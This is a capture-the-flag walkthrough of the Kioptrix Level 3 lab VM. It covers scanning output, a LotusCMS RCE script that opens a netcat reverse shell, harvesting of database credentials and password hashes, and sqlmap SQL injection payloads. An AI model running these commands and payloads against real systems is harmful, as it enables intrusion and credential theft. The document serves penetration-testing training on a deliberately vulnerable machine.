Security Exposed: Kioptrix Level 3

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of the VM Kioptrix L3 from Vulnhub - a site dedicated to penetration testing Capture The Flag challenges.

Download the VM from here: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Scenario let's try this:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.139
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.139
dirb http://192.168.180.139
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
nikto -h 192.168.180.139

In case there is SMB:
smbclient -N -L 192.168.180.139
enum4linux -a 192.168.180.139

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240

_____________________________________________________________________________

IP At MAC Address Count Len MAC Vendor / Hostname

-----------------------------------------------------------------------------

192.168.180.1 00:50:56:c0:00:08 1 60 VMware, Inc.

192.168.180.2 00:50:56:f9:f6:4a 1 60 VMware, Inc.

192.168.180.139 00:0c:29:e3:3f:e5 1 60 VMware, Inc.

192.168.180.254 00:50:56:ee:9d:40 1 60 VMware, Inc.

nmap -sV -T4 -O -F --version-light 192.168.180.139

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:38 EDT

Nmap scan report for 192.168.180.139

Host is up (0.00019s latency).

Not shown: 98 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

MAC Address: 00:0C:29:E3:3F:E5 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:39 EDT

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

| ssh-hostkey:

| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)

| ssh-dss AAAAB3NzaC1kc3MAAACBAL4CpDFXD9Zn2ONktcyGQL37Dn6s9JaOv3oKjxfdiABm9GjRkLEtbSAK3vhBBUJTZcVKYZk21lFHAqoe/+pLr4U9yOLOBbSoKNSxQ2VHN9FOLc9C58hKMF/0sjDsSIZnaI4zO7M4HmdEMYXONrmj2x6qczbfqecs+z4cEYVUF3R3AAAAFQCuG9mm7mLm1GGqZRSICZ+omMZkKQAAAIEAnj8NDH48hL+Pp06GWQZOlhte8JRZT5do6n8+bCgRSOvaYLYGoNi/GBzlET6tMSjWMsyhVY/YKTNTXRjqzS1DqbODM7M1GzLjsmGtVlkLoQafV6HJ25JsKPCEzSImjeOCpzwRP5opjmMrYBMjjKqtIlWYpaUijT4uR08tdaTxCukAAACBAJeJ9j2DTugDAy+SLCa0dZCH+jnclNo3o6oINF1FjzICdgDONL2YbBeU3CiAL2BureorAE0lturvvrIC2xVn2vHhrLpz6NPbDAkrLV2/rwoavbCkYGrwXdBHd5ObqBIkoUKbI1hGIGA51nafI2tjoXPfIeHeNOep20hgr32x9x1x

| 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)

|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==

80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch

|_http-title: Ligoat Security - Got Goat? Security ...

MAC Address: 00:0C:29:E3:3F:E5 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

TCP/IP fingerprint:

OS:SCAN(V=7.01%E=4%D=8/15%OT=22%CT=1%CU=34293%PV=Y%DS=1%DC=D%G=Y%M=000C29%T

OS:M=57B155A9%P=i586-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=

OS:7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=M5

OS:B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A

OS:0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S

OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW

OS:5%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W

OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)

OS:T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%U

OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.001 days (since Mon Aug 15 01:38:55 2016)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=205 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE

HOP RTT ADDRESS

1 0.18 ms 192.168.180.139

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 01:39

Completed NSE at 01:39, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 01:39

Completed NSE at 01:39, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds

Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.346KB)

nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139

Nothing interesting from this scan.

dirb http://192.168.180.139

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Mon Aug 15 01:49:58 2016

URL_BASE: http://192.168.180.139/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.180.139/ ----

==> DIRECTORY: http://192.168.180.139/cache/

==> DIRECTORY: http://192.168.180.139/core/

+ http://192.168.180.139/data (CODE:403|SIZE:326)

+ http://192.168.180.139/favicon.ico (CODE:200|SIZE:23126)

==> DIRECTORY: http://192.168.180.139/gallery/

+ http://192.168.180.139/index.php (CODE:200|SIZE:1819)

==> DIRECTORY: http://192.168.180.139/modules/

==> DIRECTORY: http://192.168.180.139/phpmyadmin/

+ http://192.168.180.139/server-status (CODE:403|SIZE:335)

==> DIRECTORY: http://192.168.180.139/style/

---- Entering directory: http://192.168.180.139/cache/ ----

+ http://192.168.180.139/cache/index.html (CODE:200|SIZE:1819)

---- Entering directory: http://192.168.180.139/core/ ----

==> DIRECTORY: http://192.168.180.139/core/controller/

+ http://192.168.180.139/core/index.php (CODE:200|SIZE:0)

==> DIRECTORY: http://192.168.180.139/core/lib/

==> DIRECTORY: http://192.168.180.139/core/model/

==> DIRECTORY: http://192.168.180.139/core/view/

---- Entering directory: http://192.168.180.139/gallery/ ----

+ http://192.168.180.139/gallery/index.php (CODE:500|SIZE:5650)

==> DIRECTORY: http://192.168.180.139/gallery/photos/

==> DIRECTORY: http://192.168.180.139/gallery/themes/

---- Entering directory: http://192.168.180.139/modules/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.139/phpmyadmin/ ----

+ http://192.168.180.139/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)

+ http://192.168.180.139/phpmyadmin/index.php (CODE:200|SIZE:8136)

==> DIRECTORY: http://192.168.180.139/phpmyadmin/js/

==> DIRECTORY: http://192.168.180.139/phpmyadmin/lang/

+ http://192.168.180.139/phpmyadmin/libraries (CODE:403|SIZE:342)

+ http://192.168.180.139/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)

==> DIRECTORY: http://192.168.180.139/phpmyadmin/scripts/

==> DIRECTORY: http://192.168.180.139/phpmyadmin/themes/

---- Entering directory: http://192.168.180.139/style/ ----

+ http://192.168.180.139/style/admin.php (CODE:200|SIZE:356)

+ http://192.168.180.139/style/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.180.139/core/controller/ ----

+ http://192.168.180.139/core/controller/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.180.139/core/lib/ ----

+ http://192.168.180.139/core/lib/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.180.139/core/model/ ----

+ http://192.168.180.139/core/model/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.180.139/core/view/ ----

+ http://192.168.180.139/core/view/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.180.139/gallery/photos/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.139/gallery/themes/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.139/phpmyadmin/js/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.139/phpmyadmin/lang/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.139/phpmyadmin/scripts/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.139/phpmyadmin/themes/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

-----------------

END_TIME: Mon Aug 15 01:50:07 2016

DOWNLOADED: 46120 - FOUND: 17

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ

********************************************************

* Wfuzz 2.1.3 - The Web Bruteforcer *

********************************************************

Target: http://192.168.180.139/FUZZ

Total requests: 3036

==================================================================

ID Response Lines Word Chars Request

==================================================================

00489: C=301 9 L 31 W 357 Ch "cache"

..."

00692: C=301 9 L 31 W 356 Ch "core"

..."

00779: C=403 10 L 33 W 326 Ch "data"

..."

02082: C=301 9 L 31 W 362 Ch "phpmyadmin"

..."

03035: C=404 9 L 35 W 324 Ch "yomama"..."

Finishing pending requests...

nikto -h 192.168.180.139

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP: 192.168.180.139

+ Target Hostname: 192.168.180.139

+ Target Port: 80

+ Start Time: 2016-08-15 02:01:11 (GMT-4)

---------------------------------------------------------------------------

+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch

+ Cookie PHPSESSID created without the httponly flag

+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.

+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 15:22:00 2009

+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.

+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.

+ OSVDB-3268: /icons/: Directory indexing found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ /phpmyadmin/: phpMyAdmin directory found

+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.

+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host

+ End Time: 2016-08-15 02:01:22 (GMT-4) (11 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

http://192.168.180.139/phpmyadmin/Documentation.html

phpMyAdmin 2.11.3 Documentation

http://192.168.180.139/phpmyadmin

Welcome to phpMyAdmin 2.11.3deb1ubuntu1.3

http://192.168.180.139/phpmyadmin/changelog.php

2.11.3.0 (2007-12-08)

http://192.168.180.139/index.php?system=Admin

Proudly Powered by: LotusCMS

http://192.168.180.139/gallery/index.php

At this point I added kioptrix3.com to the host file.

Did not work:
https://www.exploit-db.com/exploits/15964/

Let's try this one:
https://github.com/Hood3dRob1n/LotusCMS-Exploit

./lotusRCE.sh kioptrix3.com /

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.180.132
What PORT?
443

OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

nc -nlvp 443

listening on [any] 443 ...

connect to [192.168.180.132] from (UNKNOWN) [192.168.180.139] 47705

ps -aux

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND

root 1 0.0 0.3 2844 1692 ? Ss 04:33 0:00 /sbin/init

root 2 0.0 0.0 0 0 ? S< 04:33 0:00 [kthreadd]

root 3 0.0 0.0 0 0 ? S< 04:33 0:00 [migration/0]

root 4 0.0 0.0 0 0 ? S< 04:33 0:00 [ksoftirqd/0]

root 5 0.0 0.0 0 0 ? S< 04:33 0:00 [watchdog/0]

root 6 0.0 0.0 0 0 ? S< 04:33 0:00 [events/0]

root 7 0.0 0.0 0 0 ? S< 04:33 0:00 [khelper]

root 41 0.0 0.0 0 0 ? S< 04:33 0:00 [kblockd/0]

root 44 0.0 0.0 0 0 ? S< 04:33 0:00 [kacpid]

root 45 0.0 0.0 0 0 ? S< 04:33 0:00 [kacpi_notify]

root 104 0.0 0.0 0 0 ? S< 04:33 0:00 [kseriod]

root 143 0.0 0.0 0 0 ? S 04:33 0:00 [pdflush]

root 144 0.0 0.0 0 0 ? S 04:33 0:00 [pdflush]

root 145 0.0 0.0 0 0 ? S< 04:33 0:00 [kswapd0]

root 187 0.0 0.0 0 0 ? S< 04:33 0:00 [aio/0]

root 1272 0.0 0.0 0 0 ? S< 04:33 0:00 [ata/0]

root 1275 0.0 0.0 0 0 ? S< 04:33 0:00 [ata_aux]

root 1284 0.0 0.0 0 0 ? S< 04:33 0:00 [scsi_eh_0]

root 1287 0.0 0.0 0 0 ? S< 04:33 0:00 [scsi_eh_1]

root 2208 0.0 0.0 0 0 ? S< 04:33 0:00 [kjournald]

root 2364 0.0 0.1 2224 664 ? S<s 04:34 0:00 /sbin/udevd --daemon

root 2732 0.0 0.0 0 0 ? S< 04:34 0:00 [kpsmoused]

root 3864 0.0 0.1 1716 516 tty4 Ss+ 04:34 0:00 /sbin/getty 38400 tty4

root 3865 0.0 0.0 1716 512 tty5 Ss+ 04:34 0:00 /sbin/getty 38400 tty5

root 3869 0.0 0.1 1716 516 tty2 Ss+ 04:34 0:00 /sbin/getty 38400 tty2

root 3870 0.0 0.1 1716 516 tty3 Ss+ 04:34 0:00 /sbin/getty 38400 tty3

root 3872 0.0 0.1 1716 516 tty6 Ss+ 04:34 0:00 /sbin/getty 38400 tty6

syslog 3913 0.0 0.1 1936 644 ? Ss 04:34 0:00 /sbin/syslogd -u syslog

root 3932 0.0 0.1 1872 548 ? S 04:34 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg

klog 3934 0.0 0.3 3028 1856 ? Ss 04:34 0:00 /sbin/klogd -P /var/run/klogd/kmsg

root 3959 0.0 0.1 5316 1020 ? Ss 04:34 0:00 /usr/sbin/sshd

root 4015 0.0 0.1 1772 524 ? S 04:34 0:00 /bin/sh /usr/bin/mysqld_safe

mysql 4057 0.0 3.2 127228 16668 ? Sl 04:34 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock

root 4059 0.0 0.1 1700 552 ? S 04:34 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld

daemon 4123 0.0 0.0 1984 420 ? Ss 04:34 0:00 /usr/sbin/atd

root 4142 0.0 0.1 2104 892 ? Ss 04:34 0:00 /usr/sbin/cron

root 4165 0.0 1.2 20780 6392 ? Ss 04:34 0:00 /usr/sbin/apache2 -k start

www-data 4184 0.0 1.2 21272 6604 ? S 04:34 0:00 /usr/sbin/apache2 -k start

www-data 4185 0.0 1.5 22032 7852 ? S 04:34 0:00 /usr/sbin/apache2 -k start

www-data 4186 0.0 1.4 21732 7332 ? S 04:34 0:00 /usr/sbin/apache2 -k start

www-data 4187 0.0 1.6 22280 8364 ? S 04:34 0:00 /usr/sbin/apache2 -k start

www-data 4188 0.0 1.3 21308 6996 ? S 04:34 0:00 /usr/sbin/apache2 -k start

dhcp 4201 0.0 0.1 2440 764 ? Ss 04:34 0:00 dhclient

root 4208 0.0 0.0 1716 508 tty1 Ss+ 04:34 0:00 /sbin/getty 38400 tty1

www-data 4209 0.0 1.2 21304 6692 ? S 04:37 0:00 /usr/sbin/apache2 -k start

www-data 4240 0.0 1.2 21272 6624 ? S 04:51 0:00 /usr/sbin/apache2 -k start

www-data 4241 0.0 1.3 21404 6736 ? S 04:51 0:00 /usr/sbin/apache2 -k start

www-data 4242 0.0 1.6 22560 8304 ? S 04:51 0:00 /usr/sbin/apache2 -k start

www-data 4254 0.0 1.2 21280 6612 ? S 04:51 0:00 /usr/sbin/apache2 -k start

www-data 4326 0.0 0.0 1772 488 ? S 05:45 0:00 sh -c nc -e /bin/sh 192.168.180.132 443

www-data 4327 0.0 0.0 1772 488 ? R 05:45 0:00 sh

www-data 4328 0.0 0.1 2364 920 ? R 05:46 0:00 ps -aux

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

libuuid:x:100:101::/var/lib/libuuid:/bin/sh

dhcp:x:101:102::/nonexistent:/bin/false

syslog:x:102:103::/home/syslog:/bin/false

klog:x:103:104::/home/klog:/bin/false

mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false

sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash

dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

ls -la /home/loneferret/

total 64

drwxr-xr-x 3 loneferret loneferret 4096 Apr 17 2011 .

drwxr-xr-x 5 root root 4096 Apr 16 2011 ..

-rw-r--r-- 1 loneferret users 13 Apr 18 2011 .bash_history

-rw-r--r-- 1 loneferret loneferret 220 Apr 11 2011 .bash_logout

-rw-r--r-- 1 loneferret loneferret 2940 Apr 11 2011 .bashrc

-rw------- 1 root root 15 Apr 15 2011 .nano_history

-rw-r--r-- 1 loneferret loneferret 586 Apr 11 2011 .profile

drwx------ 2 loneferret loneferret 4096 Apr 14 2011 .ssh

-rw-r--r-- 1 loneferret loneferret 0 Apr 11 2011 .sudo_as_admin_successful

-rw-r--r-- 1 root root 224 Apr 16 2011 CompanyPolicy.README

-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh

A sudo user.

cat CompanyPolicy.README

Hello new employee,

It is company policy here to use our newly installed software for editing, creating and viewing files.

Please use the command 'sudo ht'.

Failure to do so will result in you immediate termination.

CEO

cat /etc/issue

DISCLAIMER!

We at Kioptrix are not responsible for any damaged directly, or indirectly,

caused by using this system. We suggest you do not connect this installation

to the Internet. It is, after all, a vulnerable setup.

Please keep this in mind when playing the game.

This machine is setup to use DHCP.

Before playing the game, please modify your attacker's hosts file.

<ip> kioptrix3.com

This challenge contains a Web Application.

If you have any questions, please direct them to:

comms[at]kioptrix.com

Hope you enjoy this challenge.

-Kioptrix Team

Ubuntu 8.04.3 LTS \n \l

cat /etc/debian_version

lenny/sid

uname -a

Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Something I missed at first, in the gallery config:

cat gconfig.php

<?php

error_reporting(0);

A sample Gallarific configuration file. You should edit

the installer details below and save this file as gconfig.php

Do not modify anything else if you don't know what it is.

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,

// such as http://www.yoursite.com/gallery

// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";

$GLOBALS["gallarific_mysql_database"] = "gallery";

$GLOBALS["gallarific_mysql_username"] = "root";

$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

http://kioptrix3.com/phpmyadmin/

SELECT *

FROM `dev_accounts`

WHERE 1

LIMIT 0 , 30

Profiling [ Edit ] [ Explain SQL ] [ Create PHP Code ] [ Refresh ]

row(s) starting from record #

mode and repeat headers after cells

Sort by key:

Full Texts id username password

Edit Delete 1 dreg 0d3eccfb887aabd50f243b3f155c0f85 <- Mast3r

Edit Delete 2 loneferret 5badcaf789d3d1d09794d8f021f40f0e <- starwars

Something even easier, I found in other reviews:

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --dbs

___ ___| |_____ ___ ___ {1.0-dev-nongit-201606170a89}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:04:27

[04:04:27] [INFO] resuming back-end DBMS 'mysql'

[04:04:27] [INFO] testing connection to the target URL

[04:04:27] [INFO] heuristics detected web page charset 'ISO-8859-2'

[04:04:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests

[04:04:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: id=-9800 OR 6056=6056#

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -

---

[04:04:27] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 8.04 (Hardy Heron)

web application technology: PHP 5.2.4, Apache 2.2.8

back-end DBMS: MySQL 5.0

[04:04:27] [INFO] fetching database names

[04:04:28] [INFO] the SQL query used returns 3 entries

[04:04:28] [INFO] retrieved: information_schema

[04:04:28] [INFO] retrieved: gallery

[04:04:28] [INFO] retrieved: mysql

available databases [3]:

[*] gallery

[*] information_schema

[*] mysql

[04:04:28] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 2 times

[04:04:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery

___ ___| |_____ ___ ___ {1.0-dev-nongit-201606170a89}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[*] starting at 04:08:55

[04:08:55] [INFO] resuming back-end DBMS 'mysql'

[04:08:55] [INFO] testing connection to the target URL

[04:08:55] [INFO] heuristics detected web page charset 'ISO-8859-2'

[04:08:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests

[04:08:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: id=-9800 OR 6056=6056#

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -

---

[04:08:55] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 8.04 (Hardy Heron)

web application technology: PHP 5.2.4, Apache 2.2.8

back-end DBMS: MySQL 5.0

[04:08:55] [INFO] fetching tables for database: 'gallery'

[04:08:55] [INFO] the SQL query used returns 7 entries

[04:08:56] [INFO] retrieved: dev_accounts

[04:08:56] [INFO] retrieved: gallarific_comments

[04:08:56] [INFO] retrieved: gallarific_galleries

[04:08:56] [INFO] retrieved: gallarific_photos

[04:08:56] [INFO] retrieved: gallarific_settings

[04:08:56] [INFO] retrieved: gallarific_stats

[04:08:56] [INFO] retrieved: gallarific_users

Database: gallery

[7 tables]

+----------------------+

| dev_accounts |

| gallarific_comments |

| gallarific_galleries |

| gallarific_photos |

| gallarific_settings |

| gallarific_stats |

| gallarific_users |

+----------------------+

[04:08:56] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 2 times

[04:08:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 04:08:56

